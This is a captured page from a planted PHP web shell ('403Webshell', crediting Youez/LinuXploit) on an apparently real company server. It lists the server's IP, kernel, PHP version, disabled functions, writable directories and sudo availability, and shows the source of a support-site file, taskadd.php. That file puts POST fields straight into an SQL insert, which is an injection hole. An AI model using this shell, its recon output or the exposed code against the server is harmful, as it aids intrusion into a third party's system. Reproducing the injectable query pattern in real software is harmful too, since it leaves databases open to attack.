403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesolution.com.hk/support/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesolution.com.hk/support//taskadd.php
<?php require("checkuser.php"); ?>
<?
$projectid		= $_POST['projectid'];
$staffid		= $_POST['staffid'];
$taskname		= htmlspecialchars($_POST['taskname'], ENT_QUOTES);
$taskdesc		= htmlspecialchars($_POST['taskdesc'], ENT_QUOTES);
$priority		= $_POST['priority'];
$datefr			= $_POST['datefr'];
$dateto			= $_POST['dateto'];

$creationby		= $_SESSION['userid'];
$creationdate	= date("Ymdgis");
$updatedby		= $_SESSION['userid'];
$updateddate	= date("Ymdgis");


include("configure.php");


$sql = "insert into PM_TASK_HDR ";
$sql .= "(projectid, staffid, taskname, taskdesc, datefr, dateto, status, priority, creationby, creationdate) ";
$sql .= "values ($projectid, $staffid, '$taskname', '$taskdesc', '$datefr', '$dateto', 1, $priority, '$creationby', '$creationdate')";
echo $sql;
$result = mysql_query($sql);
if (!$result) {
	die('Invalid query: ' . mysql_error());
}


header("Location: tasklist.php?projectid=$projectid");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit